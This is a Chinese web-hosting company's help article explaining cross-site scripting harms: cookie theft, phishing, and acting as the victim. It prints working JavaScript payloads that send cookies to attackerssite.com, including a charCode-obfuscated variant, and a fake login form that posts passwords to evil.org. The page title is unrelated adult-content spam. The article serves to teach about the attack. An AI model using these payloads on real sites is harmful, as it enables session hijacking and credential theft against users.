一级女人毛片人一女人-一级女性大黄生活片免费-一级女性全黄久久生活片-一级女性全黄生活片免费-国产美女在线一区二区三区-国产美女在线观看

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

跨站腳本攻擊深入解析:跨站危害及cookie盜竊(1)

發布時間:  2012/9/14 18:25:46
跨站腳本的名稱源自于這樣一個事實,即一個Web 站點(或者人)可以把他們的選擇的代碼越過安全邊界線注射到另一個不同的、有漏洞的Web 站點中。當這些注入的代碼作為目標站點的代碼在受害者的瀏覽器中執行時,攻擊者就能竊取相應的敏感數據,并強迫用戶做一些用戶非本意的事情。

在本文的上篇中,我們詳細介紹了跨站腳本漏洞利用的過程,并對HTML注入進行深入分析;而本文將詳細介紹跨站腳本的危害,以及攻擊者是如何誘騙受害者的;最后介紹針對跨站腳本攻擊的防御措施。

一、跨站腳本的危害

XSS是一種對Web應用程序的用戶發動的攻擊,利用它攻擊者能裝扮成被攻擊的用戶來完全控制Web應用程序,即便Web應用程序位于一個防火墻之后并且攻擊者無法直接接觸該Web應用程序也是如此。XSS一般不會對用戶的機器造成損害,也不會對Web應用程序服務器直接造成破壞。如果成功,攻擊者可以做三種事情:

竊取Cookie

在受害用戶面前假冒成Web應用程序

在Web應用程序面前假冒成受害用戶

二、竊取Cookie

Cookie一般控制著對Web應用程序的訪問,如果攻擊者偷竊了受害用戶的Cookie,那么攻擊者就可以使用受害者的Cookie來完全控制受害者的帳戶。對于Cookie來說,其最佳實踐就是讓它在一段時間后過期,這樣的話攻擊者就只能在有限的時間內訪問受害者的帳戶。可以利用下面的代碼來竊取Cookie:

var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='

+document.cookie;

或者像下面這樣:

document.write("〈 img src='http://attackerssite.com/eatMoreCookies"+

"?c="+document.cookie+"'〉");

 

如果某些字符是禁止的,則將其轉換為ASCII的十進制數,然后使用JavaScript的String.charFromCode()函數即可。下列JavaScript等價于前面的JavaScript:

eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,

97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,

97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,

101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,

100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));

三、釣魚攻擊

通過假冒Web應用程序,攻擊者可以將XSS用于社會工程。XSS攻擊得手后,攻擊者能夠完全控制Web應用程序的外觀。這可用于丑化web,例如攻擊者在頁面上放置一個無聊的圖片。適于打印的常見圖像之一是Stall0wn3d,即你被黑了。

下面是用于這種攻擊的HTML注入字符串:

〈script〉document.body.innerHTML="〈img

src=http://evil.org/stallown3d.jpg〉";〈/script〉.

 

然而,控制Web應用程序呈現在受害用戶面前的外觀比簡單顯示一些火辣熱圖更為有利,攻擊者可以以此發動釣魚攻擊:強制用戶向攻擊者提供機密信息。利用document.body.innerHTML,可以提供一個跟有弱點的Web應用程序的登錄頁面外觀完全一樣的登錄頁面,并且該登錄頁面來自那個被注入HTML的域,但是提交表單時,數據卻發往攻擊者選擇的站點。

因此,當受害用戶輸入他的或者她的用戶名和口令時,這些信息就會落入攻擊者手中。代碼如下所示:

document.body.innerHTML="〈 h1 〉Company Login〈 / h1〉〈form

action=http://evil.org/grabPasswords method=get〉

〈p〉User name:〈input type=text name=u〉〈p〉Password〈input type=password

name=p〉〈input type=submit name=login〉〈/form〉";

使用這段代碼的一個小技巧是通過一個GET請求發送表單。這樣,攻擊者甚至不必編寫grabPasswords頁面,因為該請求將寫到Web服務器的錯誤信息日志里,這里的信息可以輕松讀取。

 

四、冒充受害者胡作非為

XSS對Web應用程序最大的影響在于,黑客能夠通過它假冒成Web應用程序的合法用戶。下面是一些攻擊者能夠對Web應用程序做的一些事情:
在一個webmail應用程序中,攻擊者可以:

以用戶的名義發送電子郵件

獲取用戶的聯系人名單

更改自動BCC屬性

更改隱私/日志記錄設置

在基于 Web 的即時通訊或聊天軟件中,攻擊者可以:

獲取聯系人名單

向聯系人發送消息

添加/刪除聯系人

在一個基于 Web 的網絡銀行或金融系統中,攻擊者能夠:

劃拔資金

申請信用卡

更改地址

在電子商務系統上,攻擊者能夠:

購買商品

每當分析XSS對站點的影響時,想一想如果他控制了受害者的鼠標和鍵盤能干什么就行了。考慮一下受害者的內部網中的受害者的計算機能做哪些壞事。要想假冒成用戶,攻擊者需要弄清Web應用程序是如何工作的。有時候,可以通過閱讀頁面源代碼來達此目的,但是最好的方法是使用一個Web代理,例如Burp Suite、WebScarab或者Paros Proxy等。

這些web 代理會攔截往返于Web 瀏覽器和Web服務器之間的所有通信數據,甚至包括通過HTTPS傳輸的流量。您可以記錄這些會話以弄明白Web應用程序是向服務器發送回數據的。 這對于弄清楚如何假冒成該應用程序非常有幫助,此外,web 代理對于發現XSS及其他Web應用程序漏洞也有極大的幫助。
如果有需要服務器的租用與托管的敬請聯系QQ:1501281758(億恩星辰)   聯系電話:0371—63322220


本文出自:億恩科技【www.laynepeng.cn】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線